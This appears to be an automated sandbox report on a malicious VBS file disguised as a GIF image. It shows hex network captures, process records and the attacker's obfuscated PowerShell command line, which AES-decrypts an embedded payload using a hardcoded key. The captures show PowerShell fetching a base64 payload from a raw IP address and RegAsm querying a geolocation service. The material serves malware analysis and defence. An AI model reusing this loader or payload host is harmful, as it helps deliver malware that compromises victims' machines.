                                Jul 27, 2024 13:32:07.589943886 CEST1236INData Raw: 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04
                                Data Ascii: pC.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:
                                Jul 27, 2024 13:32:07.589955091 CEST1236INData Raw: 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a
                                Data Ascii: cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                                Jul 27, 2024 13:32:07.590033054 CEST1236INData Raw: eb 61 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70
                                Data Ascii: aY w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
                                Jul 27, 2024 13:32:07.590044975 CEST1236INData Raw: 57 5c 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30
                                Data Ascii: W\*`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
                                Jul 27, 2024 13:32:07.590054035 CEST1236INData Raw: 06 4f 0b d1 be 96 3d 34 91 ab 2a 0a 56 dd 44 fc 6f df 03 c5 b9 32 29 42 6c d7 5a ba c1 4e ab b5 4a a6 c2 a2 98 ef 27 77 c6 b3 d1 ff 00 f0 c7 fd a9 48 d4 a9 80 9b 60 45 30 1f 0c 3e a7 c1 f4 d0 68 e6 54 49 5c b0 f4 95 50 cc be d5 df ae 07 8f 50 c6
                                Data Ascii: O=4*VDo2)BlZNJ'wH`E0>hTI\PP@"c4J22)Fpc,i^Hm4q`w12>8miUnq`f7m(/=EDZ}=>G7'BfHH8iV;B?{<i3nYvb}<
                                Jul 27, 2024 13:32:07.590060949 CEST1236INData Raw: 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b 95 da c3 9e e7 f8 b1 d9 4b ad 3a 00 3e 7d 30 31 fc 69 61 85 16 38 c2 07 2d b8 ed 51 d2 b1 3d 0a 22 d3 b9 a2
                                Data Ascii: 4n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]UC*K)\Foi2(3++GE/&8eU[:dW)V?L(D(E7,h$`c}f )*nsgS
                                Jul 27, 2024 13:32:07.590137005 CEST1236INData Raw: 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb
                                Data Ascii: G-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j}0=pk`ESqHx1>~M.#z_
                                Jul 27, 2024 13:32:07.590147018 CEST1236INData Raw: 3a 99 d6 dd ca ee 08 39 b5 20 96 f8 90 cc 09 cc fd 27 88 be 9f 49 a9 63 23 22 95 65 76 50 3d 41 81 1b 78 17 54 4e 01 24 f0 ff 00 0e d2 6b df 67 87 4a 49 a8 80 91 1e 22 24 60 76 95 2c c7 72 fa 4f 2d 5d af a9 cf 36 f3 69 54 ca 93 c3 b9 dc ee 49 76
                                Data Ascii: :9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v
                                Jul 27, 2024 13:32:07.590156078 CEST1236INData Raw: e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61
                                Data Ascii: gmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<=o4s$,fYz,q*t*Ux+,NG*)UeUe
                                Jul 27, 2024 13:32:07.590166092 CEST1236INData Raw: 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5
                                Data Ascii: Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO!"=y#_o^m Pq.by/Dh-6q'@4)*}eb-G=\r(,}if,
                                Jul 27, 2024 13:32:07.590400934 CEST1236INHTTP/1.1 200 OK
                                Date: Sat, 27 Jul 2024 11:32:07 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
                                ETag: "1d7285-61ce2d35c4b0c"
                                Accept-Ranges: bytes
                                Content-Length: 1929861
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: image/jpeg
                                Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.749700192.3.176.154803092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                Jul 27, 2024 13:32:09.178566933 CEST80OUTGET /xampp/glo/KBV.txt HTTP/1.1
                                Host: 192.3.176.154
                                Connection: Keep-Alive
                                Jul 27, 2024 13:32:09.658693075 CEST1236INHTTP/1.1 200 OK
                                Date: Sat, 27 Jul 2024 11:32:09 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                Last-Modified: Fri, 26 Jul 2024 01:22:35 GMT
                                ETag: "a1000-61e1c58a4d3b3"
                                Accept-Ranges: bytes
                                Content-Length: 659456
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/plain
                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
                                Jul 27, 2024 13:32:09.658760071 CEST224INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                                Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1
                                Jul 27, 2024 13:32:09.658770084 CEST1236INData Raw: 41 55 4e 38 55 44 4f 31 67 53 4e 6b 55 44 46 30 77 50 4e 30 54 44 38 30 77 4f 4e 6f 54 44 32 30 51 4e 4e 45 54 44 72 30 51 4b 4e 67 53 44 6e 30 77 49 4e 49 53 44 65 30 41 47 4e 59 52 44 56 30 51 45 4e 41 52 44 4d 30 67 42 4e 51 51 44 44 7a 77 2f
                                Data Ascii: AUN8UDO1gSNkUDF0wPN0TD80wONoTD20QNNETDr0QKNgSDn0wINISDe0AGNYRDV0QENARDM0gBNQQDDzw/M4PD4zw9MYPD1zA8M4ODtAAQAgBgBQDQOYkDFAAAAMAgBADAAA0D4AAAAMAgBwCAOgjD24QIOAiDf4gEOogDB3w+NofD23A8NIeDe3w1NYdDO3QzNwcDLAAAAwAgBQCgNwYDL1AbNsWDq1QaNgWDn1gZNMWDi1QYN
                                Jul 27, 2024 13:32:09.658787966 CEST1236INData Raw: 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44
                                Data Ascii: mDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD72QuNcbD1
                                Jul 27, 2024 13:32:09.658798933 CEST1236INData Raw: 77 6d 4f 6f 70 44 5a 36 41 6d 4f 63 70 44 57 36 51 6c 4f 51 70 44 54 36 67 6b 4f 45 70 44 51 36 77 6a 4f 34 6f 44 4e 36 41 6a 4f 73 6f 44 4b 36 51 69 4f 67 6f 44 48 36 67 68 4f 55 6f 44 45 36 77 67 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66
                                Data Ascii: wmOopDZ6AmOcpDW6QlOQpDT6gkOEpDQ6wjO4oDN6AjOsoDK6QiOgoDH6ghOUoDE6wgOIoDB6AQO8nD+5QfOwnD75geOknD45wdOYnD15AdOMnDy5QcOAnDv5gbO0mDs5waOomDp5AaOcmDm5QZOQmDj5gYOEmDg5wXO4lDd5AXOslDa5QWOglDT5gUOElDQ4QFOQhDT4gEAAAA4AUAwAAAA1AcN4WDs1gaNgWDm1AZNIWDg1gXN
                                Jul 27, 2024 13:32:09.658807993 CEST1236INData Raw: 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44
                                Data Ascii: nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4MwODrzg6MkODozw5MYODlzA5MMODizQ4MAODf
                                Jul 27, 2024 13:32:09.658813953 CEST1236INData Raw: 41 6a 50 70 37 54 79 2b 30 72 50 78 36 54 6e 2b 45 70 50 76 34 7a 4a 2b 6b 67 50 42 30 54 2b 39 45 66 50 70 33 6a 6d 39 34 33 4f 78 76 7a 35 37 30 37 4f 77 75 6a 54 37 30 7a 4f 33 73 6a 4d 37 77 79 4f 4f 73 54 42 36 77 76 4f 6e 72 7a 59 36 6f 6b
                                Data Ascii: AjPp7Ty+0rPx6Tn+EpPv4zJ+kgPB0T+9EfPp3jm943Oxvz5707OwujT70zO3sjM7wyOOsTB6wvOnrzY6okOCkD85MeOYnDt5QYO3lTX4IPOyezv38jNjZjHzA2MaFjOwEPMNDjuw4KMiCjlwEFM5AjDAAAAICQBgBwPv/D3/A9PE/zn/Q3Py8TK/MyPY8TD+MvPN7zs+EoPZ5TK+ERPu2jk9cTPs0jD9QAPxzj56QtOFhDy20nN
                                Jul 27, 2024 13:32:09.658823013 CEST1236INData Raw: 71 44 6b 36 63 6f 4f 78 70 7a 57 36 41 69 4f 56 6f 44 44 35 73 64 4f 54 6e 6a 52 35 55 54 4f 6c 6b 54 48 35 77 41 4f 38 66 7a 2b 33 59 36 4e 57 65 54 65 33 55 67 4e 51 56 54 36 31 45 57 4e 55 55 54 43 30 55 50 4e 59 54 54 6f 30 38 46 4e 75 4d 6a
                                Data Ascii: qDk6coOxpzW6AiOVoDD5sdOTnjR5UTOlkTH5wAO8fz+3Y6NWeTe3UgNQVT61EWNUUTC0UPNYTTo08FNuMjMzMyMXMzByouMiLDuyEmMVJTSyUjMpEzxx8bMhGTmxEZMJGTPw4NMWCjewwDMyADEAAAA4CABQDAAA8D//89Pw+Tm/o2PV9TB+EePY3Dt9oAPAzzo8AHPYtzz7c7OruTd7I2OksTF6YtOxpzF6wQO/nD354bOBgDu
                                Jul 27, 2024 13:32:09.658833981 CEST1236INData Raw: 73 30 4d 70 4d 7a 48 7a 49 78 4d 4a 49 7a 37 79 34 74 4d 70 4b 44 6f 79 38 6f 4d 44 4b 44 61 79 63 6c 4d 69 49 7a 47 78 34 65 4d 6e 48 6a 4c 77 49 4c 4d 65 43 41 41 42 51 4a 41 45 41 49 41 2f 49 36 50 58 39 7a 4a 2b 59 76 50 6d 79 7a 38 37 73 4d
                                Data Ascii: s0MpMzHzIxMJIz7y4tMpKDoy8oMDKDayclMiIzGx4eMnHjLwILMeCAABQJAEAIA/I6PX9zJ+YvPmyz87sMOJcTp1oHNzQzL0sCNnQzI08BNbQzFyEmMEET1xoGM3ATBAAAA4AABwBAAA4ze+AXPO2DZ9oTPNwz+8c4OLvzc7k0OjoT/6g7Nsejm3QZMkHj3xsWMlFzBwgNMODDxAAAA8AABgBAAA4zX98FPYyjf8sGPRxjP8QyO
                                Jul 27, 2024 13:32:09.658844948 CEST1236INData Raw: 50 44 36 7a 51 2b 4d 67 50 7a 56 79 41 75 4d 63 4c 44 32 79 51 74 4d 51 4c 44 7a 79 67 73 4d 45 4c 7a 4c 78 67 62 4d 30 47 44 73 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 7a 45 41 41 41 41 6b 42 77 41 51 44 77 50 2f 39 54 62 2f 73 30 50 32 38 6a
                                Data Ascii: PD6zQ+MgPzVyAuMcLD2yQtMQLDzygsMELzLxgbM0GDsxwaMoGDpxAaMcGzEAAAAkBwAQDwP/9Tb/s0P28jF/QQPn3jK2gHN8PDgyYtMFKDfygmMMITAxMfMlHD2xIcMtGjixMXMeFjTxAUM0EDKxoRMLAT8AAAAIBwAADwPV7zW9sdPG1zP8ANPFzDq8gHPmxzM8YCPcsjLAAAAkAwAwCAAAkjM5gCOejD14EKOUej5349NVfDm
                                Jul 27, 2024 13:32:09.664772987 CEST1236INData Raw: 63 44 50 77 77 6a 4b 38 51 43 50 54 73 6a 39 37 45 2b 4f 62 76 7a 30 37 34 37 4f 78 75 54 70 37 63 35 4f 79 6c 44 41 34 6b 50 4f 74 6a 54 31 34 30 46 4f 52 64 44 72 33 59 36 4e 4e 64 6a 51 32 51 76 4e 6c 62 7a 33 32 63 74 4e 37 5a 7a 55 31 34 63
                                Data Ascii: cDPwwjK8QCPTsj97E+Obvz0747OxuTp7c5OylDA4kPOtjT140FORdDr3Y6NNdjQ2QvNlbz32ctN7ZzU14cNhWDn1cYNyVjV1AUN4UzL14BN/RDY0sEN+QjL0kxMGPDuz84M8NzYzg0M4MDMzchMtLT3yUtM9KTny0nMhJjQyciMKEz6x4cMJHjtxwaMiGDnxcZMMGDhxwXM0FTbxYWMfFDWxEVMKFzQx0TM3ETMxsSMlAj8wkOM


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.749702178.237.33.50806048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                Jul 27, 2024 13:32:12.626852989 CEST71OUTGET /json.gp HTTP/1.1
                                Host: geoplugin.net
                                Cache-Control: no-cache
                                Jul 27, 2024 13:32:13.238667011 CEST1170INHTTP/1.1 200 OK
                                date: Sat, 27 Jul 2024 11:32:13 GMT
                                server: Apache
                                content-length: 962
                                content-type: application/json; charset=utf-8
                                cache-control: public, max-age=300
                                access-control-allow-origin: *
                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:07:32:03
                                Start date:27/07/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs"
                                Imagebase:0x7ff6161c0000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:07:32:04
                                Start date:27/07/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLL